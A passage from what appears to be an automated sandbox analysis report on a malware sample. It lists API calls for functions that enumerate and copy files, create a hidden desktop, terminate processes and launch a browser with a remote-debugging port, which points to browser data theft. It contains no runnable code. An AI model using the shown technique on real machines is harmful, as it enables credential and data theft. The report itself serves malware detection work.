                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005012B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005012BF
                        • lstrlen.KERNEL32(00524CA8), ref: 005012CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005012E7
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 005012F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0050133A
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050135C
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 00501376
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005013AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 005013D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005013E2
                        • lstrlen.KERNEL32(00521794), ref: 005013ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050140A
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501416
                        • lstrlen.KERNEL32(?), ref: 00501423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501443
                        • lstrcat.KERNEL32(00000000,?), ref: 00501451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050147A
                        • StrCmpCA.SHLWAPI(?,0103CF38), ref: 005014A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 005014E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501535
                        • StrCmpCA.SHLWAPI(?,0103D268), ref: 00501552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501593
                        • lstrcpy.KERNEL32(00000000,?), ref: 005015BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005015E4
                        • StrCmpCA.SHLWAPI(?,0103D058), ref: 00501602
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501633
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050165C
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501685
                        • StrCmpCA.SHLWAPI(?,0103CF50), ref: 005016B3
                        • lstrcpy.KERNEL32(00000000,?), ref: 005016F4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050171D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501745
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005017BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 005017F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0050181C
                        • FindClose.KERNEL32(00000000), ref: 0050182B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: fdb94736a6c46cddafd4c28a557384ab4f5a823d43963e963a308fa897f03451
                        • Instruction ID: 87768f6adbd87102f48e5c5a47f694b2fc8ef6bfd6d3f59f040e9fa33f798bc8
                        • Opcode Fuzzy Hash: fdb94736a6c46cddafd4c28a557384ab4f5a823d43963e963a308fa897f03451
                        • Instruction Fuzzy Hash: 6D129070A1060A9BCB20EF75DD89AAF7BB8BF44304F04852DF946D7290DB78DC458B99
                        Function 0050CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0050CBFC
                        • FindFirstFileA.KERNEL32(?,?), ref: 0050CC13
                        • lstrcat.KERNEL32(?,?), ref: 0050CC5F
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050CC71
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 0050CC8B
                        • wsprintfA.USER32 ref: 0050CCB0
                        • PathMatchSpecA.SHLWAPI(?,01038B70), ref: 0050CCE2
                        • CoInitialize.OLE32(00000000), ref: 0050CCEE
                          • Part of subcall function 0050CAE0: CoCreateInstance.COMBASE(0051B110,00000000,00000001,0051B100,?), ref: 0050CB06
                          • Part of subcall function 0050CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0050CB46
                          • Part of subcall function 0050CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0050CBC9
                        • CoUninitialize.COMBASE ref: 0050CD09
                        • lstrcat.KERNEL32(?,?), ref: 0050CD2E
                        • lstrlen.KERNEL32(?), ref: 0050CD3B
                        • StrCmpCA.SHLWAPI(?,0051CFEC), ref: 0050CD55
                        • wsprintfA.USER32 ref: 0050CD7D
                        • wsprintfA.USER32 ref: 0050CD9C
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0050CDB0
                        • wsprintfA.USER32 ref: 0050CDD8
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0050CDF1
                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0050CE10
                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 0050CE28
                        • CloseHandle.KERNEL32(00000000), ref: 0050CE33
                        • CloseHandle.KERNEL32(00000000), ref: 0050CE3F
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0050CE54
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050CE94
                        • FindNextFileA.KERNEL32(?,?), ref: 0050CF8D
                        • FindClose.KERNEL32(?), ref: 0050CF9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                        • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 3860919712-2388001722
                        • Opcode ID: bee480ed6b588a2119a528fd450eedfd2ff299e1c47df6aee88c8feaafe58428
                        • Instruction ID: 3d539445b450d535f09e1d6da03d0b391b9cd3cb0767ce3ae7be653ecd3bebc5
                        • Opcode Fuzzy Hash: bee480ed6b588a2119a528fd450eedfd2ff299e1c47df6aee88c8feaafe58428
                        • Instruction Fuzzy Hash: 36C1A371A002199FDB60DF64DC45EEE7B79FF89300F048599FA0997280EA34AE85CF55
                        Function 00501269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00501291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005012B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005012BF
                        • lstrlen.KERNEL32(00524CA8), ref: 005012CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005012E7
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 005012F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0050133A
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050135C
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 00501376
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005013AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 005013D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005013E2
                        • lstrlen.KERNEL32(00521794), ref: 005013ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050140A
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501416
                        • lstrlen.KERNEL32(?), ref: 00501423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501443
                        • lstrcat.KERNEL32(00000000,?), ref: 00501451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050147A
                        • StrCmpCA.SHLWAPI(?,0103CF38), ref: 005014A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 005014E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501535
                        • StrCmpCA.SHLWAPI(?,0103D268), ref: 00501552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501593
                        • lstrcpy.KERNEL32(00000000,?), ref: 005015BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005015E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005017BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 005017F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0050181C
                        • FindClose.KERNEL32(00000000), ref: 0050182B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: 69e334aa731cb8d863ea03ca99871338b3dfbb9f6542ba728230eb1988643c30
                        • Instruction ID: f7047453aa1548181d6d680c4839594966ac085a43746f78474021f1f89adb97
                        • Opcode Fuzzy Hash: 69e334aa731cb8d863ea03ca99871338b3dfbb9f6542ba728230eb1988643c30
                        • Instruction Fuzzy Hash: B4C1B270A1060A9BCB31EF75DD89AAF7BB8FF00304F044429F94697291DB78DD468B99
                        Function 004F9770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 004F9790
                        • lstrcat.KERNEL32(?,?), ref: 004F97A0
                        • lstrcat.KERNEL32(?,?), ref: 004F97B1
                        • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004F97C3
                        • memset.MSVCRT ref: 004F97D7
                          • Part of subcall function 00513E70: lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00513EA5
                          • Part of subcall function 00513E70: lstrcpy.KERNEL32(00000000,01039A78), ref: 00513ECF
                          • Part of subcall function 00513E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,004F134E,?,0000001A), ref: 00513ED9
                        • wsprintfA.USER32 ref: 004F9806
                        • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 004F9827
                        • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 004F9844
                          • Part of subcall function 005146A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 005146B9
                          • Part of subcall function 005146A0: Process32First.KERNEL32(00000000,00000128), ref: 005146C9
                          • Part of subcall function 005146A0: Process32Next.KERNEL32(00000000,00000128), ref: 005146DB
                          • Part of subcall function 005146A0: StrCmpCA.SHLWAPI(?,?), ref: 005146ED
                          • Part of subcall function 005146A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00514702
                          • Part of subcall function 005146A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00514711
                          • Part of subcall function 005146A0: CloseHandle.KERNEL32(00000000), ref: 00514718
                          • Part of subcall function 005146A0: Process32Next.KERNEL32(00000000,00000128), ref: 00514726
                          • Part of subcall function 005146A0: CloseHandle.KERNEL32(00000000), ref: 00514731
                        • lstrcat.KERNEL32(00000000,?), ref: 004F9878
                        • lstrcat.KERNEL32(00000000,?), ref: 004F9889
                        • lstrcat.KERNEL32(00000000,00524B60), ref: 004F989B
                        • memset.MSVCRT ref: 004F98AF
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004F98D4
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F9903
                        • StrStrA.SHLWAPI(00000000,0103DFD8), ref: 004F9919
                        • lstrcpyn.KERNEL32(007293D0,00000000,00000000), ref: 004F9938
                        • lstrlen.KERNEL32(?), ref: 004F994B
                        • wsprintfA.USER32 ref: 004F995B
                        • lstrcpy.KERNEL32(?,00000000), ref: 004F9971
                        • Sleep.KERNEL32(00001388), ref: 004F99E7
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                          • Part of subcall function 004F92B0: strlen.MSVCRT ref: 004F92E1
                          • Part of subcall function 004F92B0: strlen.MSVCRT ref: 004F92FA
                          • Part of subcall function 004F92B0: strlen.MSVCRT ref: 004F9399
                          • Part of subcall function 004F92B0: strlen.MSVCRT ref: 004F93E6
                          • Part of subcall function 00514740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00514759
                          • Part of subcall function 00514740: Process32First.KERNEL32(00000000,00000128), ref: 00514769
                          • Part of subcall function 00514740: Process32Next.KERNEL32(00000000,00000128), ref: 0051477B
                          • Part of subcall function 00514740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051479C
                          • Part of subcall function 00514740: TerminateProcess.KERNEL32(00000000,00000000), ref: 005147AB
                          • Part of subcall function 00514740: CloseHandle.KERNEL32(00000000), ref: 005147B2
                          • Part of subcall function 00514740: Process32Next.KERNEL32(00000000,00000128), ref: 005147C0
                          • Part of subcall function 00514740: CloseHandle.KERNEL32(00000000), ref: 005147CB
                        • CloseDesktop.USER32(?), ref: 004F9A1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                        • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                        • API String ID: 958055206-1862457068
                        • Opcode ID: 5496307f3dacdd6fc3f13e9e9664c36133381ebc1dc01c608c6fa7f4d784d485
                        • Instruction ID: 861074b958468b24be15263ef23f1c83073546378cfc655033acfcc1aeeb7721
                        • Opcode Fuzzy Hash: 5496307f3dacdd6fc3f13e9e9664c36133381ebc1dc01c608c6fa7f4d784d485
                        • Instruction Fuzzy Hash: 4C919571A10218ABEB20DF64DC49FEE77B8FF48700F148199F609A7281DB749E458FA4
                        Function 0050E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0050E22C
                        • FindFirstFileA.KERNEL32(?,?), ref: 0050E243
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050E263
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 0050E27D
                        • wsprintfA.USER32 ref: 0050E2A2
                        • StrCmpCA.SHLWAPI(?,0051CFEC), ref: 0050E2B4
                        • wsprintfA.USER32 ref: 0050E2D1
                          • Part of subcall function 0050EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0050EE12
                        • wsprintfA.USER32 ref: 0050E2F0
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0050E304
                        • lstrcat.KERNEL32(?,0103E398), ref: 0050E335
                        • lstrcat.KERNEL32(?,00521794), ref: 0050E347
                        • lstrcat.KERNEL32(?,?), ref: 0050E358
                        • lstrcat.KERNEL32(?,00521794), ref: 0050E36A
                        • lstrcat.KERNEL32(?,?), ref: 0050E37E
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0050E394
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E3D2
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E422
                        • DeleteFileA.KERNEL32(?), ref: 0050E45C
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0050E49B
                        • FindClose.KERNEL32(00000000), ref: 0050E4AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                        • String ID: %s\%s$%s\*
                        • API String ID: 1375681507-2848263008
                        • Opcode ID: 2949cd4d3ba05f1f5e4642e7855a57cf8b6fc27b8c78bec33aac25e1d4768c25
                        • Instruction ID: a8fabe24c49623c0f514ed65ffba0df01608904d7e7165bf2db424a9ac220c41
                        • Opcode Fuzzy Hash: 2949cd4d3ba05f1f5e4642e7855a57cf8b6fc27b8c78bec33aac25e1d4768c25
                        • Instruction Fuzzy Hash: F381A27190021D9BCB20EF65DD49EEF7B79FF44300F048999B60A93190DB79AA45CF94
                        Function 004F16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F16E2
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F1719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F176C
                        • lstrcat.KERNEL32(00000000), ref: 004F1776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F17A2
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F18F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F18FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat
                        • String ID: \*.*
                        • API String ID: 2276651480-1173974218
                        • Opcode ID: 2186b0796d91b4f5b0c85f54af5e771f781c55adeeda3c2d9186bbe9e8e2acfe
                        • Instruction ID: 7178292dd0ed4abbd2a8f91fa0f077e95808ad11a86878fb460449675cbf7897
                        • Opcode Fuzzy Hash: 2186b0796d91b4f5b0c85f54af5e771f781c55adeeda3c2d9186bbe9e8e2acfe
                        • Instruction Fuzzy Hash: F2819671A1021EDBCB21EF65D985ABF77B8EF14304F04412AFA0597261CBBC9D11CB99
                        Function 0050DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0050DD45
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0050DD4C
                        • wsprintfA.USER32 ref: 0050DD62
